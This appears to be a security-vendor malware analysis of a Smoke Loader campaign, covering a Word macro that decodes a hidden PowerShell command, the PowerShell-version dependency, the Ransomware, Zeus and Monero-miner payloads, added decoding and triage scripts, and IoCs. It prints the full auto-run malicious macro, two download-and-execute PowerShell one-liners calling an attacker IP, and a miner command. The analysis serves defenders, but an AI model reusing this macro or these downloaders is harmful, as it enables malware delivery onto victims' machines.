Authored by Alexander Sevtsov
Edited by Stefano Ortolani
Introduction
Everybody knows that PowerShell is a powerful tool to automate different tasks in Windows. Unfortunately, many bad actors know that it is also a sneaky way for malware to download its payload. A few days ago we stumbled upon an interesting macro-based document file (sha1: b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16) that is making one too many assumptions about the underlying operating system, thus sometimes failing to execute.
The Malicious Document
The malicious document file consists of the following macro code:
Private Sub Document_Open()
    Dim abasekjsh() As Byte, bfjeslksl As String, izhkaheje As Long
    ' Chr(84)+Chr(105)+Chr(116)+Chr(108)+Chr(101) spells "Title": read that property as raw bytes
    abasekjsh = StrConv(ThisDocument.BuiltInDocumentProperties(Chr(84) + Chr(105) + Chr(116) + Chr(108) + Chr(101)), vbFromUnicode)
    ' Decode: subtract 6 from every byte ...
    For izhkaheje = 0 To UBound(abasekjsh)
        abasekjsh(izhkaheje) = abasekjsh(izhkaheje) - 6
    Next izhkaheje
    ' ... then reverse the resulting string
    bfjeslksl = StrReverse(StrConv(abasekjsh, vbUnicode))
    ' Element 0 of the "|"-separated string is a placeholder for ".", element 1 is the command line;
    ' FPATH is replaced by the document's full path and the command runs with a hidden window (0 = vbHide)
    Shell (Replace(Replace(Split(bfjeslksl, "|")(1), Split(bfjeslksl, "|")(0), Chr(46)), "FPATH", ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name)), 0
End Sub
The macro itself is nothing special: it builds the property name “Title” from Chr() calls and reads that property through the BuiltInDocumentProperties collection of the current document. The property value is then decoded (every byte is decremented by 6 and the result is reversed) into a PowerShell command line, in which a placeholder is swapped back to “.” and FPATH is replaced by the document's full path. The command line is eventually executed via the Shell method with a hidden window.
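To recover the command line from a document's metadata without opening it in Word, the macro's transform can be replayed offline. The following is an added example, not code from the sample or from Lastline; it reimplements the VBA steps one by one, and the sample command, document path and placeholder character it uses are constructed for illustration (the real sample's Title value is not reproduced).

```python
"""Offline decoder for the Title-property obfuscation used by the macro above.

Added example, not code from the sample or from Lastline: it mirrors the VBA
routine step by step so an analyst can recover the command line from the
document's metadata without executing the macro.
"""

SHIFT = 6  # the macro subtracts 6 from every byte of the Title property


def decode_title(title: str, doc_path: str) -> str:
    """Replay the macro's transform and return the command line it would run."""
    raw = title.encode("latin-1")                     # StrConv(..., vbFromUnicode): one byte per character
    shifted = bytes((b - SHIFT) % 256 for b in raw)   # abasekjsh(i) = abasekjsh(i) - 6
    decoded = shifted.decode("latin-1")[::-1]         # StrReverse(StrConv(abasekjsh, vbUnicode))
    parts = decoded.split("|")                        # Split(bfjeslksl, "|")
    if len(parts) < 2:
        raise ValueError("Title property does not contain the '|' separator")
    placeholder, command = parts[0], parts[1]         # element 0 stands in for '.', element 1 is the command;
                                                      # anything after a second '|' is dropped, exactly as VBA's Split(...)(1) does
    command = command.replace(placeholder, ".")       # Replace(..., placeholder, Chr(46))
    return command.replace("FPATH", doc_path)         # Replace(..., "FPATH", ActiveDocument.Path & sep & Name)


def build_fixture(command: str, placeholder: str = "#") -> str:
    """Constructed test input only: apply the macro's steps in reverse so the
    decoder can be exercised offline. `placeholder` stands in for '.' and must
    not otherwise occur in the command."""
    plain = placeholder + "|" + command.replace(".", placeholder)
    return bytes((b + SHIFT) % 256 for b in plain[::-1].encode("latin-1")).decode("latin-1")


# Constructed, harmless stand-in for the real command line (the real sample's
# Title property is not reproduced here); the document path is hypothetical.
SAMPLE_COMMAND = "powershell.exe -w 1 Get-Item -LiteralPath 'FPATH'"
SAMPLE_DOC_PATH = r"C:\Users\analyst\Desktop\invoice.docm"
SAMPLE_TITLE = build_fixture(SAMPLE_COMMAND)


def decode_sample() -> str:
    """Decode the constructed fixture; returns the command with FPATH resolved."""
    return decode_title(SAMPLE_TITLE, SAMPLE_DOC_PATH)


if __name__ == "__main__":
    print("Title property :", repr(SAMPLE_TITLE))
    print("Decoded command:", decode_sample())
```

In practice the Title value is read straight from the OOXML or OLE metadata (for example with olefile or by unzipping docProps/core.xml) and passed to decode_title together with the path the document would have on the victim's machine. Note that because the macro splits on "|", a command line containing a pipe would be truncated; the decoder reproduces that behaviour rather than hiding it.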
The PowerShell Downloader
Instead of using sophisticated evasion techniques, the malware relies on a feature available from PowerShell 3.0 onwards. To download the malicious code the command invokes the Invoke-WebRequest cmdlet:
powershell.exe -w 1 Invoke-WebRequest -Uri http://80.82.67[.]217/poop.jpg -OutFile ([System.IO.Path]::GetTempPath()+'\DKSPKD.exe');powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\DKSPKD.exe');
This tiny detail has the side-effect of requiring Windows 8 or later for the command to complete successfully. Note that although PowerShell comes installed by default since Windows 7, PowerShell 3.0 is only available on Windows 7 as an optional update. Therefore any network activity can only be observed if the underlying operating system is at least Windows 8, or if Windows 7 has that specific update installed. In other words, the more diverse our analysis environments, the better our chances of eliciting the malicious behavior.
Payload – Smoke Loader
The payload is a variant of the Smoke Loader family (Figure 1), which exhibits a large number of different activities when analyzed by the Lastline sandbox (sha1: f227820689bdc628de34cc9c21000f3d458a26bf).
As often happens, signatures are not really informative, as we can see in Figure 2.
The aim of this malware is to download other components by sending 5 different POST requests to microsoftoutlook[.]bit/email/send.php. While some are met with a 404 error, three are successful and download the following payloads:
- GlobeImposter Ransomware eventually displaying the ransom note in Figure 3.
- Zeus trojan banker, also known as Zbot, capturing online banking sessions and stealing credentials from known FTP clients, such as FlashFXP, CuteFtp, WsFTP, FileZilla, BulletProof FTP, etc.
- Monero CPU miner based on the open source XMRig project (as indicated by some of the strings included in the binary, see Figure 4). The command used to spawn the miner reveals a well-known pool and user id we have already been seeing:
wuauclt.exe -o stratum+tcp://ca.minexmr.com:443 -u 49X9ZwRuS6JR74LzwjVx2tQRQpTnoQUzdjh76G3BmuJDS7UKppqjiPx2tbvgt27Ru6YkULZ4FbnHbJZ2tAqPas12PV5F6te.smoke30+10000 -p x --safe
Intelligence
It’s worth mentioning that this is not the first time we have seen the IP address from which the loader is downloaded. Based on our intelligence records, another malicious VBA-based document file (sha1: 03a06782e60e7e7b724a0cafa19ee6c64ba2366b) called a similar PowerShell script that executed perfectly in a default Windows 7 installation:
powershell $webclient = new-object System.Net.WebClient; $myurls = 'http://80.82.67[.]217/moo.jpg'.Split(','); $path = $env:temp + '\~tmp.exe'; foreach($myurl in $myurls) { try { $webclient.DownloadFile($myurl.ToString(), $path); Start-Process $path; break; } catch {} }
This variant downloads the payload by invoking the DownloadFile method from the System.Net.WebClient class, indeed a much more common (and backward compatible) approach to retrieve a remote resource.
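Both command lines above (the Invoke-WebRequest one and the WebClient one) share the same download-to-temp-and-run shape, and the download primitive each uses tells an analyst which PowerShell version, and hence which Windows version, a sandbox needs before any network activity can show up. The following triage script is an added example, not Lastline code: the indicator regexes, the benign third sample line and the version mapping are constructed for illustration, and only the first two sample lines are the ones quoted in this article (with IPs defanged as printed). It generalizes slightly beyond the page by also catching the Windows PowerShell aliases of Invoke-WebRequest (iwr, wget, curl).

```python
"""Heuristic triage of PowerShell command lines for the download-and-run
pattern seen in both variants of this campaign. Added example, not Lastline
code; tune the indicators before using them in a real detection pipeline."""
import re
from typing import Dict, List, Optional, Set

# Each indicator is a case-insensitive regex over the full command line.
INDICATORS = {
    # -w 1 / -WindowStyle Hidden: run without a visible console
    "hidden_window": r"(?:^|\s)-w(?:indowstyle)?\s+(?:1|hidden)\b",
    # Invoke-WebRequest and its Windows PowerShell aliases: requires PowerShell 3.0+
    "download_iwr": r"invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b",
    # System.Net.WebClient: works on PowerShell 2.0, i.e. a default Windows 7
    "download_webclient": r"net\.webclient|\.downloadfile\(|\.downloadstring\(",
    # payload written to the user's temp directory
    "drop_to_temp": r"gettemppath\(\)|\$env:\s*temp\b|%temp%",
    # dropped file or downloaded text executed
    "launch": r"start-process|invoke-item|\bsaps\b|\biex\b|invoke-expression",
    "remote_url": r"https?://",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in INDICATORS.items()}


def matched_indicators(cmdline: str) -> Set[str]:
    """Names of all indicators whose regex matches the command line."""
    return {name for name, rx in COMPILED.items() if rx.search(cmdline)}


def minimum_powershell_version(cmdline: str) -> Optional[str]:
    """Lowest PowerShell version on which the download primitive exists.

    This is what decides whether a default Windows 7 sandbox (PowerShell 2.0)
    can ever show the network activity, or whether Windows 8+ is required."""
    hits = matched_indicators(cmdline)
    if "download_iwr" in hits:
        return "3.0"
    if "download_webclient" in hits:
        return "2.0"
    return None


def is_suspicious_downloader(cmdline: str) -> bool:
    """Download primitive + remote URL + (drop to temp or launch) = download-and-run."""
    hits = matched_indicators(cmdline)
    has_download = bool(hits & {"download_iwr", "download_webclient"})
    return has_download and "remote_url" in hits and bool(hits & {"drop_to_temp", "launch"})


# Sample process command lines: the first two are quoted from the article
# (IPs defanged as printed there); the third is a constructed benign admin task.
SAMPLE_CMDLINES = [
    r"powershell.exe -w 1 Invoke-WebRequest -Uri http://80.82.67[.]217/poop.jpg -OutFile ([System.IO.Path]::GetTempPath()+'\DKSPKD.exe');powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\DKSPKD.exe');",
    r"powershell $webclient = new-object System.Net.WebClient; $myurls = 'http://80.82.67[.]217/moo.jpg'.Split(','); $path = $env:temp + '\~tmp.exe'; foreach($myurl in $myurls) { try { $webclient.DownloadFile($myurl.ToString(), $path); Start-Process $path; break; } catch {} }",
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
]


def triage(cmdlines: List[str]) -> List[Dict[str, object]]:
    """One summary row per command line: indicators, required PS version, verdict."""
    return [
        {
            "cmdline": c[:60] + ("..." if len(c) > 60 else ""),
            "indicators": sorted(matched_indicators(c)),
            "min_ps_version": minimum_powershell_version(c),
            "suspicious": is_suspicious_downloader(c),
        }
        for c in cmdlines
    ]


if __name__ == "__main__":
    for row in triage(SAMPLE_CMDLINES):
        print(row)
```

Feeding the two campaign command lines through triage() flags both as download-and-run, but reports "3.0" for the Invoke-WebRequest variant and "2.0" for the WebClient variant, which is exactly the distinction that determines whether a Windows 7 analysis environment will ever see the payload being fetched.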
Mitigation
There is an inherent problem with dynamic analysis: which version of the underlying operating system should be used? To address this issue, the Lastline engine is capable of running deep behavioral analysis on several different operating systems, increasing the probability of a successful execution. Moreover, application bundles (see previous article for more details) can be further used to shape the analysis environment when additional requirements are needed to elicit the malicious behavior.
Figure 5 shows what the analysis overview looks like when analyzing the sample discussed in this article: besides some reported structural anomalies, which are detected by our static document analysis, we can see that dynamic behaviors are exhibited only in Windows 10.
Figure 5. Analysis overview of the malicious macro-based document file (sha1: b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16)
Conclusion
In this article, we analyzed a malicious macro-based document that relies on a specific version of PowerShell to deliver Smoke Loader, a highly sophisticated multi-component malware. It does so by calling a cmdlet that is normally not available in the PowerShell shipped with Windows 7, showing once more that operating system diversity is a key requirement for successful dynamic analysis.
Appendix: IoCs
Files | SHA1
The Malicious Document | b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16
Smoke Loader | f227820689bdc628de34cc9c21000f3d458a26bf
Monero CPU Miner | 88eba5d205d85c39ced484a3aa7241302fd815e3
Zeus Trojan | 54949587044a4e3732087a56bc1d36096b9f0075
GlobeImposter Ransomware | f3cd914ba35a79317622d9ac47b9e4bfbc3b3b26
Network | Indicator
Payload download host | 80.82.67[.]217
IP address | 107.181.254[.]15
Smoke Loader C&C | microsoftoutlook[.]bit
The post Smoke Loader Campaign: When Defense Becomes a Numbers Game appeared first on Lastline.
Article Link: https://www.lastline.com/labsblog/smoke-loader-campaign/